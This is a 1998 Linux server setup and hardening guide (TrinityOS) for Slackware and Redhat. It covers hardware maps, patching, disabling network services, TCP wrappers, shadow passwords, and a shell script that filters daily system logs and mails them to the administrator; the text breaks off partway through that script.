06/14/98 TrinityOS - A Complete Linux network server configuration guide for the Linux novice and Linux guru alike! This document is intended for a techincal audience that doesn't want to research how to install the various Linux services by themselves. This system design guide was initially based off the Slackware v3.2 distribution but due to a recent disk crash, I'm installing Redhat5 now. I will now try to make the TrinityOS doc reflect both distros. Note: Most of the functionality given in this document is available in a STOCK installation of Redhat5, Debian, or any other modern Linux distribution. So, if you are using any other distribution than Redhat or Debian.. use this doc as a reference or project management guide only. You will then need to obtain and configure the new software for your Linux distribution in its native methods. ** Please note that this document is still "Under Construction". Everything in the current features list has been implemented but isn't necessarily documented yet. If you have any specific questions.. feel free to ask via email. ********************************************************************* ** ** ** Do you want to get an e-mail when I update the TrinityOS doc? ** ** Just send an e-mail to dranch@ecst.csuchico.edu with a subject ** ** of "Add me to your updates list" and I'll add you to the list! ** ** ** ********************************************************************* --David dranch@trinnet.net -------------------------------------------------------------------------------- Current Features: Section 1 - Intro 2 - ChangeLOG (what you are reading now) 3 - Current TrintiyOS Feature set 4 - Hardware configuration (I/O and disk maps) 5 - Software download map and checklist 6 - Linux distribution installation + OS patching (including notes for choosing a Distribution) 7 - Initial System Security 8 - Advanced System Logging and link to MASQ startup 9 - MASQ startup and advanced firewall rulesets 10 - Initial Linux Kernel compiling 11 - Compile PPPd 12 - Final Linux Kernel compiling and installation 13 - Lilo configuration and installation 14 - Additional RC script configuration and network optimization 15 - Patching, Compiling, and installing IPFWADM 16 - Mail aliases for system administration 17 - Preparing for reboot and clearing the logs 18 - Verifing MASQ module installation 19 - Install TCPDUMP for tracing traffic 20 - PPPd configuration 21 - Diald configuration [For Modem users only] 22 - BIND Installation and Configuration (only v4 complete) 23 - Sendmail configuration 24 - NTP Time calibration 25 - DHCPd configuration 26 - POP3 Mail 27 - Configuring BRU and backing up 28 - Full SSH telnet and X-windows encrypted tunnels .. 34 - Final Security and up-to-date Linux Security & patching (NEVER complete!) ================================================================================ Section 2 - ChangeLOG +--------------------------------------------------+ | Notice to all TrinityOS viewers: | | | | - If there are any sections that you would | | like to be added/modified/corrected, etc, | | just let me know! | | dranch@trinnet.net | +--------------------------------------------------+ 06/14/98 - Updated the SSH section to reflect upgrading to v1.2.25 to avoid a new SSH exploit. Section 28 and 34 - Clarified the POP3 setup Section 26 - Added some DNS (Bind) descriptions and security enhancements using the Bind v8.1.x "allow-transfer" and "xfernets" parameter. Also added a few other updates for my enviroment. Section 22 - Changed over NTP clients to something a little more robust and added the URL to the main NTP site for people to find a local NTP server. Also updated the NTP stuff for both updating at 15mins or 60mins and now have instructions for both Slackware and Redhat users. Section 24 - Updated the distro descriptions and how Slackware, to Redhat, to Debian are different. The more I play with Redhat, the more I realize that it ISN'T a straitforward UNIX. I also added a few fixes for Redhat users on quirks I've noticed in v5.0. Section 6 - Fixed a few things in the /etc/bruxpat file. Multi-volume ARJ files that start with EITHER a "A" or "a" (such as myfile.a01 and myfile.A01) are now not compressed. Section 27 - Changed the DHCPd setup to reflect giving out DHCP addresses to (2) more machines. Section 25 - Noted that I need to merge my existing Masq-PPP and Masq-Diald-PPP docs into TrinityOS. Section 3 and 20 - Added more things to the "Future Features" section including: Adding a CD-ROM changer, installing (2) HDs and (1) tape drive, impliment MD0spanning or software-based RAID-5, setup SPLIT-DNS, impliment automatic weekly incremental tape backups, and move this doc over to HTML format Section 3 - Made a bunch of minor layout changes 06/10/98 - Added SYSLOG (syslog, messages, kernel, maillog, etc date parsing, filtering, and mailing. This is good for when you'd like to know if any strange things are happening to your Linux box (processes failing, hacker attempts, etc). This script also optionally monitors how many times your modem line came online (or failed due to busies,etc) and report what speeds it connected at in a nice summarized table. The logs are then mailed to a specified mail address once a day. Nice! Section 8 - Added the download recommendation of Netwatch for traffic monitoring Section 5 - Updated the kernel section to reflect 2.0.34 and the new v1.16 3c509.c driver Section 10 - Added some slight changes recommended from Jim.Greer@autozone.com Spelling, etc 06/01/98 - Added full SSH client and server encryption for TELNET, Xwindows, etc Section 28 - Can't believe I forgot this one: Updated network setup to use a larger TCP window size. Do this.. it makes a HUGE difference in LAN speed. Section 14 - Added the patch-2.5.2.i386.rpm to fix the --nodep issues (should be in Redhat's Errata but isn't) 05/30/98 - Added a Redhat errata section to talk about how to update your machine to the newest, most secure code. I mention how to install RPMs in bulk, how Redhat documents their errata and specifically mention the installation of the following rpms: rpm-2.5.1-1.i386.rpm glibc-2.0.7-13.i386.rpm glibc-devel-2.0.7-13.i386.rpm Section 34 05/15/98 - Added a backup script for BRU to back this all up! Section 28 - Made some format changes 05/08/98 - Added security issues/fixes for DIP and Xterm (apply these fixes! Users can get root EASY!) Section 34 04/27/98 - Added some changes to the /etc/rc.d/init.d/gpm file to properly support the old C7 Logitech mouse Section 14 04/22/98 - Added comsat for Redhat users (dumb to disable) Section 7 04/21/98 - Procps patch Section 34 04/19/98 - Added log rotation configs for the "syslog" file - Application of all recent Redhat OS patches - Added notes on how to choose a Linux distribution - Added rc.serial configs for advanced COMM port design and optimization. - Added patch info on the new OffbyONE Linux DoS attack 04/18/98 - Added a missing broadcast route for DHCP - Added a missing statement for sendmail masquerading 04/17/98 - Added Bind v8 configurations - Added sendmail envelope options - Added DHCPd support - Added Shadow passwords to Redhat5 04/12/98 - Added dynamic IP address configs for the advanced firewall rulesets 04/11/98 - Doh! Forgot the link to my PPP/Diald setup in section 19 04/10/98 - More major layout changes - Added Section labels - Added the Advanced firewall rulesets - Added configuration changes for BIND v8.x (not complete) 04/09/98 - Major document layout changes (hopefully more logical now) - Added modifications for the Redhat distribution - Added configuration setups for Cablemodems 04/06/98 - More Security stuff 04/01/98 - Published to WWW site - Added IP MASQ timeouts - Added additional formatting to this doc 02/09/09 - Added Xkeyboard issue - Device DoS - IMAP & IPOP 02/06/98 - Added Solar buffer-exploit handler 01/01/98 - Added more security stuff 12/09/97 - Added cron security issue and aliases 11/11/97 - WWW proxy / filtering 11/03/97 - Major changes 05/18/97 - Original start ================================================================================ Section 3 - Feature Sets Current Features: + Full LAN masquerading (IP MASQ) using a private class B + Masq port forwarding support (IPportfw) + Advanced packet filter firewall ruleset + PPP connectivity to your ISP (for modem users) + Dial-on-Demand Internet connections (modem users) + Automatic Internet connections every 15 minutes (modem users) + Dual 10Mb/s Ethernet network support (3c509b) NICs (modem and cablemodem users) and network optimization + Full Bind v8 (and v4) DNS and DNS caching service + Full Sendmail mail system support w/ domain masqurading + TELNET, FTP, and POP3 services + Secured IP address telnet access + Modified telnet and ftp port addresses + Full SVGA X-Windows support (Xfree only. Metrox-X sucks) + Advanced SYSLOG logging + Advanced system security + DHCP server for other LAN machines (laptops, etc) + NTP time calibrated + SCSI-based TR4 tape backup via BRU + Full SSH telnet and X-windows encrypted tunnels Future Features: - Add the new Nakamichi 7-CD CD-ROM changer to the system - Install the (2) new SCSI HDs and Hp TR4 tape drive - Impliment either MD0 hard drive spanning or software-based RAID-5 - Update the DNS setup to be a SPLIT-DNS setup for additional internal security - Full APC SmartUPS powerdown support - Full Samba Microsoft Windows file & printing support - Impliment automatic weekly incremental tape backups to the TR4 tape drive. - Fold my existing Linux-PPP and and Linux-Masq-PPP doc into TrinityOS. - Sound Blaster 16 and SB32AWE-PnP sound support - 128-bit encrypted Apache WWW server - BZip2 compression w/ tar patches - Iomega parallel ZIP drive support - Tripwire Security Breech monitoring - WWW Proxy services - WWW banner add filtering - SATAN / COPS / ISS tested - Move this doc over to HTML format!!!!!! ================================================================================= Section 4 - Hardware Configuration This document uses methodologies that I have developed over time that have saved my ass on several occasions (Drive partition maps, I/O and IRQ maps). They may seem like a pain in the ass but they are a major help when things break or you are adding new hardware. -- - Distribution: - Redhat 5.x w/ all available patches or - Slackware v3.2 - Full install of Packages: - Slackware v3.2 Service Pack 2 - Kernel v2.0.33 (The 2.1.x kernels don't have complete MASQ support yet) Hardware Used: - ASUS GX4 Motherboard / 256k cache - AMD 486/160Mhz/40MB RAM - Network: Eth0: 3Com 3c509 (IRQ 9) - cablemodem interface Eth1: 3Com 3C509b (IRQ 12) - Internal LAN interface - Video: Cirrus Logic 5429 VLB (2MB Dram) - Sound: Sound Blaster 16 (IRQ 10; DMA 1,6; Port 220, CD-Port 300) - Controllers: - Generic EIDE Controller (VLB) (IRQ 14,15) - Adaptec 1542b SCSI controller (IRQ 11, DMA 5, port 334) - Hard Drives: - HDA: Western Digital 1.0GB Caviar (EIDE) [LBA] - HDB: none - HDC: Western Digital 540MB (EIDE) [LBA] - HDD: Seagate 540MB (EIDE) [LBA] Dead: Western Digital 1.2GB Caviar (EIDE) - CD-Roms: - SBPCD0: Panasonic quad (dead drive?) - SCD0: Philips Quad - Nec 4x4 Quad speed / 4 Disc changer (future) - I/O:(See docs on IRQTUNE to better understand why these are like this. It makes a difference!) ttyS0: USR Courier v.Everything (IRQ 4) ttyS1: Dec Hub console (IRQ 3) ttyS2: APC SmartUPS UPS (IRQ 3) ttyS3: Logitech 3b mouse (IRQ 5) LPT1: Hp LaserJet-IIp (samba share) LPT2: Iomegga Zip drive ------ I/O Maps and "Expert" fdisk partition tables ----- IRQ Map: 0: timer (system) 1: keyboard(system) 2: Cascade (system) 3: COM2-UPS (VLB controller) & COM3-HUB (ISA controller) 4: COM1-modem (VLB controller) 5: COM4-Mouse (ISA controller) 6: Floppy (system) 7: LPT1-printer 8: Clock (system) 9: Cascade-3c509 (cablemodem) 10: SoundBlaster 16 11: 1542b SCSI 12: 3c509b (internal LAN) 13: Math coprocessor 14: IDE0 15: IDE1 Port MAP: 170-1F7h: IDE1 1F0-1F7h: IDE0 200-207h: (not used) usually Joystick 220-22Fh: SoundBlaster 16 230-233h: SoundBlaster 16 CD-ROM interface 260- ? h: 3c509b (eth1) 278-27Fh: LPT1 2A0-2AFh: 3c509 (eth0) 2E8-2EFh: COM4 2F8-2FFh: COM2 330-331h: SoundBlaster MPU-401 334-337h: Adaptec 1542b 376-376h: IDE1 378-37Fh: LPT1 388-38Bh: SoundBlaster OPL2/3 3E8-3EFh: COM3 3F0-3F5h: Floppy drive 3F6-3F6h: IDE0 DCOOh: AHA1542b BIOS E400h: System BIOS E800h: Systen BIOS F000h: System BIOS DMA Map: 0 - Dunno. 1 - SoundBlaster16 LOW 2 - Alternative Floppy DMA 3 - Floppy DMA 4 - Casecade 5 - 1542b 6 - SoundBlaster 16 HIGH SCSI Map: 0 - Conner 1060S - 1.05GB 1 - Seagate ST21300N - 1.3GB 2 - 3 - 4 - Philips 4x CD-Rom /dev/hda (expert mode printout) Disk /dev/hda: 64 heads, 63 sectors, 525 cylinders Nr AF Hd Sec Cyl Hd Sec Cyl Start Size ID 1 80 1 1 0 63 63 25 63 104769 06 2 00 0 1 26 63 63 523 104832 2007936 05 3 00 0 0 0 0 0 0 0 0 00 4 00 0 0 0 0 0 0 0 0 00 5 00 1 1 26 63 63 76 63 205569 82 6 00 1 1 77 63 63 523 63 1802241 83 /dev/hdc (expert mode printout) Disk /dev/hdc: 32 heads, 63 sectors, 524 cylinders Nr AF Hd Sec Cyl Hd Sec Cyl Start Size ID 1 00 1 1 0 31 63 511 63 1032129 83 2 00 0 0 0 0 0 0 0 0 00 3 00 0 0 0 0 0 0 0 0 00 4 00 0 0 0 0 0 0 0 0 00 /dev/hdd (expert mode printout) Disk /dev/hdc: 32 heads, 63 sectors, 524 cylinders Nr AF Hd Sec Cyl Hd Sec Cyl Start Size ID 1 00 1 1 0 31 63 511 63 1032129 83 2 00 0 0 0 0 0 0 0 0 00 3 00 0 0 0 0 0 0 0 0 00 4 00 0 0 0 0 0 0 0 0 00 /dev/sda (expert mode printout) Disk /dev/hdc: 32 heads, 63 sectors, 524 cylinders Nr AF Hd Sec Cyl Hd Sec Cyl Start Size ID 1 00 1 1 0 31 63 511 63 1032129 83 2 00 0 0 0 0 0 0 0 0 00 3 00 0 0 0 0 0 0 0 0 00 4 00 0 0 0 0 0 0 0 0 00 /dev/sdb (expert mode printout) Disk /dev/sdb: 64 heads, 32 sectors, 1006 cylinders Nr AF Hd Sec Cyl Hd Sec Cyl Start Size ID 1 00 1 1 0 63 32 1005 32 2060256 83 2 00 0 0 0 0 0 0 0 0 00 3 00 0 0 0 0 0 0 0 0 00 4 00 0 0 0 0 0 0 0 0 00 BIOS Setup (Specific to the ASUS GX4 Award BIOS) - This is abbrev'ed here for me: Features: - Disabled - ON - Setup - Enabled - High - Enabled - Enabled - Enabled - Disabled - Enabled - Disabled - Disabled - C, A - 6 - Disabled - Disabled - 250 - Disabled Chipset: Auto-Disabled Auto Sync BUS 1/4 Write-Thru Speed- faster 1 0 2 1T Non Enabled Disabled Enabled Enabled Enabled 2uS T2 Installed cards: VLB EIDE Controller w/ I/O [2-16550] IDE0: Enabled IDE1: Enabled Joystick: Disabled Serial1: Enabled COM1/IRQ4 (modem) Serial2: Enabled COM2/IRQ3 (UPS) Parallel: Enabled LPT1/polling (printer) ISA Multi-I/O Serial1: Enabled COM3/IRQ3 (HUB) Serial2: Enabled COM4/IRQ5 (Mouse) Parallel: Enabled LPT2/IRQ (ZIP) Joystick: Disabled SoundBlaster16: Joystick: Enabled ================================================================================= Section 5 - Software download map and checklist Initial Linux Distribution installation hints: - If you ever need to FTP into the linux box as root (you CAN'T by default), edit the "/etc/ftpusers" file and put a "#" in front of "root. **** MAKE SURE YOU REMOVE THIS "#" ONCE YOU ARE DONE! ** Redhat: - If you need to login via telnet as root (you CAN'T by default) then edit the /etc/securetty file and ADD: ttyp0 ttyp1 ttyp2 **** MAKE SURE YOU PUT "#"s IN FRONT OF THESE NEW LINES ONCE YOU ARE DONE! **** Needed software for implementation (in this order): Done ---- X - Any Service Packs, security patches, etc for your installed Slackware distribution X - Newest stable kernel at ftp://ftp.cdrom.com/pub/linux/sunsite/kernel/v2.0/ X - IPFWADM (source must download regardless if installed with Redhat) Slackware: ftp://ftp.xos.nl/pub/linux/ipfwadm/ipfwadm-2.3.0.tar.gz Redhat: ftp://ftp.xos.nl/pub/linux/ipfwadm/ipfwadm-2.3.0-1.src.rpm X - The IPFWADM MASQ timeout patch at: http://ipmasq.home.ml.org/ipfwadm-2.3.0-generic-timeout.patch.gz http://hwy401.com/achau/ipmasq/ipfwadm-2.3.0-generic-timeout.patch.gz X - IP Port forwarding Homepage: http://www.ox.compsoc.org.uk/~steve/portforwarding.html patches: ftp://ftp.ox.compsoc.org.uk/pub/users/steve/ipsubs/sub-patch-1.32.gz X - PPP - v2.3.3 (not needed for cablemodem users) http://www.cdrom.com/pub/linux/sunsite/system/network/serial/ppp/ X - Diald v0.16.4 (not needed for cablemodem users) http://www.dna.lth.se/~erics/diald.html - Full Named pipe monitoring X - NAMED As of 4/17/98, The newest SECURE bind was only available in the CONTRIB area. It seems to works fine. ftp://ftp.redhat.com/pub/contrib/i386/bind-8.1.1-2.i386.rpm ftp://ftp.redhat.com/pub/contrib/i386/bind-utils-8.1.1-2.i386.rpm X - Vlock (stock in Redhat if installed) http://www.cdrom.com/pub/linux/sunsite/utils/console/vlock-1.0.tar.gz X - TCPDUMP (stock in Redhat if installed) http://www.cdrom.com/pub/linux/sunsite/system/network/management/ or ftp://ftp.ee.lbl.gov/tcpdump.tar.Z X - NetWatch ftp://ftp.digital.com/pub/linux/redhat/powertools-5.0/i386/ X - Getdate (NTP) - v1.1 (Was SETTIME) ftp://ftp.cdrom.com/pub/Linux/system/network/misc/getdate-1.1.tar.gz X - Backing up: (stock in Redhat if installed) - BRU (it's not free but its the best Linux backup software out there. This is one place you just CAN'T skimp!) X - Netscape (stock in Redhat if installed) - Samba (stock in Redhat if installed) (this version fixes an exploit on bugtract) ftp://samba.anu.edu.au/pub/samba/samba-1.9.17p2.tar.gz - IP logger ftp://ftp.tu-graz.ac.at/pub/linux/redhat-contrib/SRPMS/iplogger-0.1-1.src.rpm - Tuning: - IRQTune ftp://shell5.ba.best.com/pub/cae/irqtune.tgz - HDparm -u - WWW proxy (Apache or Squid) - WWW Ad banner filtering http://www-math.uni-paderborn.de/~axel/NoShit/index.html patch: http://www.america.com/~chrisf/web/NoShit/WebFilter_0.5.patch.gz Example filter: http://www.america.com/~chrisf/web/NoShit/library.txt - SB16 Mixer: WAV recorder/player: ================================================================================ Section 6 - Linux Distribution Installation and OS patching - Install Linux distribution (too complicated to be covered in this DOC) Here is a few comments on what Linux distribution might be right for you: Redhat: Redhat is a modern Linux distribution that has a good installation program and has some great system administration utilities too. The best part of Redhat is it's increamental "RPM" installation and upgrade system. Another major reason for going with Redhat is it's support for the new Glibc libraries. Redhat is constantly upgraded and is well supported in the Linux community. Redhat is a good choice for the Linux newbie that wants Linux up with all kinds functionality without a lot of work. It comes with everything from TELNET/FTP to Microsoft and Novell file server emulation. If you are already a UNIX snob, you might find Redhat's layout somewhat wierd (unless you are a Sun Solaris person since the /etc/rc3.d layout is similar). *BUT*.. if you want to *learn* UNIX (not specifically Linux) step-by-step and truely understand it (the hard but BEST way (IMHO)), don't install Redhat. Redhat changes the behavior of Linux to be easy to use, modifable via sctipts, etc. It doesn't do everything the UNIX way though you can reverse engineer it's scripts to understand what it really is doing. If you want to learn UNIX, go with Slackware or Debian. Slackware: Slackware is one of the original Linux distributions and it is still one of my favorite distributions. It definately isn't as slick in terms of installation or functionality compared to Redhat but it's layouted in a clear manor. It's INIT scripts (the scripts that are executed to bring the system up) use standard UNIX commands and everything is obvious and "in the open" (unlike Redhat). So, Slackware will be a comfortable fit for the UNIX peoples out there. THE major bummer about Slackware is that is hasn't had any major upgrades in quite some time. There have been rumors that Slackware will even not be upgraded unless someone else takes it over from Volker and upgrades it to Glibc, etc. I hope someone does! Debian: Though I haven't installed Debian before, many people out there seem to like it a lot. It has been best described to me as as a system that old Slackware users will LOVE. It doesn't include the kitchen sink like Redhat but it's layed out in a good mannor, has it's own RPM-like installation/upgrade system, and it supports the new Glibc library system. Like Redhat, Debian is constantly updated and well supported. There are other Distributions out there to pick from depending on your hardware platform (Dec Alpha, Motorola PowerPC, etc). You'll have to experiment and ask other Linux people what distribution they like and WHY! Upgrading/Updating your Linux ditro: Like ANY Linux distrobution, bug fixes, security releases, etc are always coming out and you NEED to stay on top of it. Redhat and Debian with their incremental update systems makes this easy. Slackware users have to use the PKGADD or "Package Add" command and pray that it won't clobber their existing configuration files. Ps. If the program you upgate to with PKGADD has different configuration file layouts, you will have to the conversion manually. Debian and Redhat's systems will do the conversion for you. Redhat users: Goto ftp://ftp.redhat.com/pub/redhat/updates/5.0/i386/ and download all the recent patches to a directory (ie. /tmp/patches). ** See Section 34 Date 5/30/98 for more specific instructions ** Now, install them by doing: rpm -Uvh *.rpm *Note:* I have noticed that the "rpm" program will crash (coredump) about 60% of the way through the process. You can safely figure out what patches it failed to install and do them manually or by doing the following: Say that the RPM program died while doing patching in the letter range (Q). So, do this to install all patches from Q to Z. "rpm -Uvh [q-zQ-Z].rpm Fixing Redhat: * These are things that I've notice that are hosed in Redhat5.0 that might have been fixed in later CD cuts or releases. - Let tmp.watch run - Do a "chmod +x /etc/cron.daily/tmp.watch" - Fix the timezone - Edit /etc/profile Just above the "EXPORT PATH" line, add the line for Pacific Daylight time (adjust for your Time zone): TZ=PST8PDT Now edit the "EXPORT PATH" line and append the word "TZ" ================================================================================ Section 7 - Initial System security - Put a password on the root login - "passwd root" - Compile / install vlock (stock if installed with Redhat) - Edit the "/etc/inetd.conf" file and remark "#" out all of the following lines (if they aren't already): - echo, discard, daytime, chargen, comsat, time, nntp, smtp, shell, login, exec, talk, ntalk, pop3, imap2, uucp, tftp, bootps, finger, systat, netstat, netbios-ssn, netbios-ns, rstatd, ruserd, walld, - You should leave "auth" enabled (firewall will fix this properly) - If you plan on using POP3 mail, don't disable "pop3" - If you want to use "biff" (command prompt mail notifier), don't comment it out here - Edit the folowing files in "/etc/rc.d/" Slackware: - rc.M - line 75: #'d out all lines for Sendmail - line 97: #'d out all lines for httpd - rc.inet2 - line 14: #'d out all lines for lpd - line 15: #'d out all lines for lpd - line 31: #'d out all lines for portmap - line 72: #'d out all lines for mountd, nfsd, pcnfsd, bwnfsd - line : #'d out all lines for lpd Redhat (goto /etc/rc.d/rc3.d for Linux boxes running in the default init mode): Rename the following files unless already done. - mv S08autofs K08autofs - mv S20nfs K20nfs - mv S20rusersd K20rusersd - mv S20rwalld K20rwalld - mv S20rwhod K20rwhod - mv S30mcserv K30mcserv - mv S35smb K35smb - mv S60lpd K60lpd - mv S65portmap K65portmap - mv S95nfsfs K95nfsfs - mv S45pcmcia K45pcmcia (unless this for a laptop) - mv S65dhcpd K65dhcpd - mv S85httpd K85httpd =========TCP wrapper security========= - Edit "/etc/hosts.deny" and insert the following at the end of the file: ALL: ALL - edit "/etc/host.allow" and insert lines at the end of the file for each IP and or Domain that you want to allow access to the Linux box: ALL: 127.0.0.1 #Needed for some local services like comsat ALL: w.x.y.z For example: ALL: 192.168.0.2 #Allow everything from Stimpy2 ALL: 192.168.0.4 #Allow everything from dellster =========Shadow Passwords========= Slackware --------- Slackware v3.2 did not come with Shadow passwords enabled but v3.4 does. For several reasons, I recommend that you just upgrade to Slackware v3.4. It fixes numerious security issues and has many other features as well. Redhat5 ------- Redhat5 out of the box does NOT do shadow passwords (stupid). But, it is easily fixed. To fix this, do the following: - login as root - type in "pwconv" - This will convert the /etc/password file and move the encrypted passwords over to /etc/shadow - Edit the /etc/pam.d/password file and change the bottom line from: password required /lib/security/pam_pwdb.so use_authtok nullok --to-- password required /lib/security/pam_pwdb.so shadow use_authtok nullok ^^^^^^ Thats it. ================================================================================ Section 8 - Advanced System Logging and link to MASQ startup - Edit /etc/syslog.conf Slackware: *.warn;*.err /var/adm/syslog mail.* /var/adm/maillog auth.*;user.*;daemon.none /var/adm/loginlog kern.* /var/adm/kernel Redhat: *.warn;*.err /var/log/syslog mail.* /var/log/maillog auth.*;user.*;daemon.none /var/log/loginlog kern.* /var/log/kernel Redhat users must to the following for the syslog file to work: touch /var/log/syslog - Redhat: Next, allow the new syslog file to be rotated as well. Add these lines to the /etc/logrotate.d/syslog: /var/log/kernel { postrotate /usr/bin/killall -9 klogd /usr/sbin/klogd & endscript } /var/log/syslog { postrotate /usr/bin/killall -HUP syslogd endscript } - Edit the "/etc/rc.d/rc.local" file and add the following lines at the end: This tip is a personal idea I like: Place "#s" in front of the following lines like shown: ## This will overwrite /etc/issue at every boot. So, make any changes you ## want to make to /etc/issue here or you will lose them when you reboot. #echo "" > /etc/issue #echo "Red Hat Linux $R" >> /etc/issue #echo "Kernel $(uname -r) on $a $(uname -m)" >> /etc/issue # #cp -f /etc/issue /etc/issue.net Then, do the following: - rm /etc/issue - rm /etc/issue.net Slackware users: echo "Enabling tty logging" tail -f /var/adm/messages > /dev/tty7 & tail -f /var/adm/syslog > /dev/tty7 & Redhat Users: echo "Enabling /dev/tty logging.." tail -f /var/log/messages > /dev/tty7 & tail -f /var/log/syslog > /dev/tty7 & tail -f /var/log/secure > /dev/tty7 & #Run the IP MASQ and firewall script /etc/rc.d/rc.masq ----- Having the syslog logs filtered and mailed to you once a day... If you are like me, you would like to know if any strange things are happening to you (processes failing, hacker attempts, etc). This script also optionally monitors how many times your modem line came online (or failed due to busies,etc) and report what speeds it connected at in a nice summarized table. To do this, follow these next steps (note: this isn't the pretties script I've wrote and it needs a LOT of cleaning but it should work for you): - Create the file Note: Slackware users: This file should be called /var/adm/sendlogs Redhat users: This file should be called /var/log/sendlogs (Note: All users: you will need to substitute in your proper mail address ( so you will get your logs ( ( Slackware users.. please change the /var/log references to ( /var/adm ( ( Modem users: You will need to un-# out the modem fields and ( make sure that the temp file swaping from ( tmp1 to tmp2 to tmp1 etc transisions are correct. ( ( I have this disabled because I'm a cablemodem dude ( now but this worked well. ---- #!/bin/sh # updated 6/5/98 mv /var/log/todays-date /var/log/yesterdays-date date +'%b %e' > /var/log/todays-date cat /var/log/messages | grep "`cat /var/log/yesterdays-date`" > messlog.`date +' %b%d%y'` set $1 messlog.`date +'%b%d%y'` sed -e "/PWD/d" -e "/PASV/d" -e "/TYPE/d" -e "/PORT/d" -e "/NLST/d" -e "/SYST/d" $1 > $1.tmp sed -e "/PASS/d" -e "/QUIT/d" -e "/LIST/d" -e "/CDUP/d" -e "/ATDT/d" -e "/Welcome/d" $1.tmp > $2.tmp sed -e "/Using/d" -e "/Connect/d" -e "/Remote/d" -e "/IP address/d" -e "/CHECKSUM/d" $2.tmp > $1.tmp sed -e "/Terminated/d" -e "/Terminating/d" -e "/diald/d" -e "/2.2.0/d" -e "/Exit./d" $1.tmp > $2.tmp sed -e "/(passwd=guest)/d" -e "/alarm/d" -e "/Failed/d" $2.tmp > $1.tmp #For messages - modem specific stuff # #sed -e "/send /d" -e "/expect/d" -e "/OK/d" -e "/AT&F/d" -e "/ATZ/d" -e "/ ^M /d" $1.tmp > $2.tmp #sed -e "/Swansea/d" -e "/logging/d" -e "/starting/d" -e "/Ready/d" -e "/0x03f8/d" -e "/0x02f8/d" $2.tmp > $1.tmp #sed -e "/sbpcd.c/d" -e "/CR-563/d" -e "/copyright/d" -e "/sockets/d" -e "/Serial/d" -e "/registered/d" $1.tmp > $2.tmp #sed -e "/SLIP/d" -e "/sbpcd-0/d" -e "/ATM0X7/d" -e "/1.44M/d" -e "/8272A/d" -e "/statistics/d" $2.tmp > $1.tmp #sed -e "/Please/d" -e "/hangup/d" -e "/ip-down/d" -e "/scans/d" $1.tmp -e "/abort on/d" $1.tmp > $2.tmp #sed -e "/CONNECT /d" -e "/BUSY/d" -e "/SIGHUP/d" $2.tmp > $1.tmp #echo -e "---------------------------------------" > header.tmp #echo -e "Trinity2 Call stats for \c" >> header.tmp #date >> header.tmp #echo -e " " >> header.tmp #echo -e "Total number of connects: \c" >> header.tmp #grep -c "CONNECT" $1.tmp >> header.tmp #echo -e " 21600: \c" >> header.tmp #grep -c "21600" $1.tmp >> header.tmp #echo -e " 26400: \c" >> header.tmp #grep -c "26400" $1.tmp >> header.tmp #echo -e " 28800: \c" >> header.tmp #grep -c "28800" $1.tmp >> header.tmp #echo -e " 31200: \c" >> header.tmp #grep -c "31200" $1.tmp >> header.tmp #echo -e " 33600: \c" >> header.tmp #grep -c "33600" $1.tmp >> header.tmp #echo -e " 33600: \c" >> header.tmp #grep -c "41333" $1.tmp >> header.tmp #echo -e " 41333: \c" >> header.tmp #grep -c "42666" $1.tmp >> header.tmp #echo -e " 42666: \c" >> header.tmp #echo -e " " >> header.tmp #echo -e "Total number of busys: \c" >> header.tmp #grep -c "BUSY" $1.tmp >> header.tmp #echo -e "---------------------------------------" >> header.tmp #echo -e " " >> header.tmp #cat header.tmp >> $1.tmp #For messages - named specific stuff # sed -e "/Cleaned/d" -e "/USAGE/d" -e "/NSTATS/d" -e "/XSTATS/d" $1.tmp > $2.tmp sed -e "/points/d" -e "/Lame server/d" $2.tmp > $1.tmp #For messges - SSH specific sed -e "/Generating /d" -e "/generation /d" -e "/NSTATS/d" -e "/XSTATS/d" $1.tmp > $2.tmp mv $1.tmp $1 mail -s "TrinityOS messages for `cat /var/log/yesterdays-date`" login@your.host < messlog.`date +'%b%d%y'` rm messlog.`date +'%b%d%y'` echo "parsed, filtered, mailed and deleted messages" #--------------------------------------------- cat /var/log/syslog | grep "`cat /var/log/yesterdays-date`" > syslog.`date +'%b%d%y'` set $3 syslog.`date +'%b%d%y'` set $3 $1 #echo $1 #echo $3 #Syslog - modem specific #sed -e "/ got /d" -e "/abort on/d" -e "/expect/d" -e "/ ^M /d" -e "/AT&F1^M^M/d" -e "/ATZ^M^M/d" -e "/ATM0X7S11=40^M^M/d" -e "/Executed/d" -e "/ATDT/d" -e "/Welcome/d" -e "/Using/d" -e "/Connect/d" -e "/Remote/d" -e "/IP address/d" -e "/CHECKSUM/d" -e "/Terminated/d" -e "/Terminating/d" -e "/diald/d" -e "/2.2.0/d" -e "/Exit./d" -e "/(passwd=guest)/d" -e "/alarm/d" -e "/Failed/d" -e "/CONNECT/d" -e "/hangup/d" -e "/RINGING^M/d" $1 > $1.tmp #syslog FTP, sed -e "/PWD/d" -e "/PASV/d" -e "/LIST/d" -e "/CDUP/d" -e "/RETR/d" -e "/CWD/d" -e "/TYPE/d" -e "/PASS/d" -e "/QUIT/d" $1 > $1.tmp #For messages sed -e "/send /d" -e "/expect/d" -e "/OK/d" -e "/AT&F/d" -e "/ATZ/d" -e "/ ^M /d" $1.tmp > $1.tmp2 sed -e "/Swansea/d" -e "/logging/d" -e "/starting/d" -e "/Ready/d" -e "/0x03f8/d" -e "/0x02f8/d" $1.tmp2 > $1.tmp sed -e "/sbpcd.c/d" -e "/CR-563/d" -e "/copyright/d" -e "/sockets/d" -e "/Serial/d" -e "/registered/d" $1.tmp > $1.tmp2 sed -e "/SLIP/d" -e "/sbpcd-0/d" -e "/1.44M/d" -e "/8272A/d" -e "/statistics/d" $1.tmp2 > $1.tmp sed -e "/Please/d" -e "/hangup/d" -e "/ip-down/d" -e "/scans/d" $1.tmp -e "/abort on/d" $1.tmp > $1.tmp2 mv $1.tmp2 $1 rm $1.tmp mail -s "TrinityOS syslog for `cat /var/log/yesterdays-date`" login@your.host < syslog.`date +'%b%d%y'` rm syslog.`date +'%b%d%y'` echo "parsed, filtered, mailed and deleted syslog" cat /var/log/secure | grep "`cat /var/log/yesterdays-date`" > secure.`date +'%b%d%y'` set $3 secure.`date +'%b%d%y'` set $3 $1 sed -e "/127/d" $1 > $1.tmp mv $1.tmp secure.`date +'%b%d%y'` mail -s "TrinityOS secure for `cat /var/log/yesterdays-date`" login@your.host < secure.`date +'%b%d%y'` rm secure.`date +'%b%d%y'` echo "parsed, filtered, mailed and deleted secure" cat /var/log/xferlog | grep "`cat /var/log/yesterdays-date`" > xferlog.`date +'%b%d%y'` mail -s "TrinityOS xferlog for `cat /var/log/yesterdays-date`" login@your.host < xferlog.`date 